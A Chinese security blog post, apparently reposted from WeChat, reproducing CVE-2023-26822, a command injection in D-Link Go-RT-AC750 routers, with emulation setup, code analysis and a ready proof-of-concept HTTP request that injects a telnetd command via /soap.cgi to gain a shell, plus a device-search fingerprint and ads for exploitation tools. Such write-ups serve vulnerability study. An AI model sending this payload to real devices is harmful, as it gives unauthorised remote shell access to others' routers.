D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)

admin 2024年11月9日23:13:03评论23 views字数 1000阅读3分20秒阅读模式

漏洞介绍

D-Link Go-RT-AC750在固件版本为revA_v101b03中存在命令注入漏洞,攻击者可以请求 /soap.cgi 路由通过携带的参数进行命令拼接。

仿真环境搭建

安装FirmAE 工具仓库

git clone --recursive https://github.com/pr0v3rbs/FirmAE

运行下载脚本

cd FirmAE/

./download.sh #下载用到的包

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)

运行./install.sh进行安装

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)

运行init.sh进行初始化

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)

正常运行起来如下图(注意路径中不要包含中文):

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)

代码分析

逻辑很简单,可以看到v14取决于v10,v10取决于v9也就是v3中?后面的内容,然后v3取决于REQUEST_URI。

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)

进入命令执行的条件

1、Content-Type: text/xml

2、SOAPAction: "a#b"

也可以借助gpt来分析条件,如下写的很明白。

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)

漏洞复现

指纹:web.body="/pic/tail.gif"(随便提的)

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)

POC:

POST /soap.cgi?service=;telnetd -p 4123& HTTP/1.1
Host: xxx.xxx.x.x:49152
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0
SOAPAction: "a#b"
Content-Length: 0
Content-Type: text/xml

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)

telnet x.x.x.x 4123成功获取到shell

D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)

总结

这个命令执行漏洞挺经典的,总结不知道总结啥,凑凑字数,没啥,就是很常规的操作。对了,分析的时候可以借助一下gpt,挺高效率,不过注意问问题的方式,别被gpt带偏了,去引导它。

资源下载

1、公众号后台回复:jboss,获取jboss综合利用工具网盘下载链接。
2、公众号后台回复:ruoyi,获取ruoyi综合利用工具网盘下载链接。
3、公众号后台回复:postgresql,获取postgresql综合利用工具网盘下载链接
4、公众号后台回复:ecologySession,获取ecology任意用户登录小工具网盘下载链接
5、公众号回复:资料获取代码审计,红队,物联网安全,漏洞挖掘相关整合资料。

原文始发于微信公众号(小黑说安全):D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月9日23:13:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   D-Link Go-RT-AC750 命令注入漏洞(CVE-2023-26822)https://cn-sec.com/archives/1875564.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息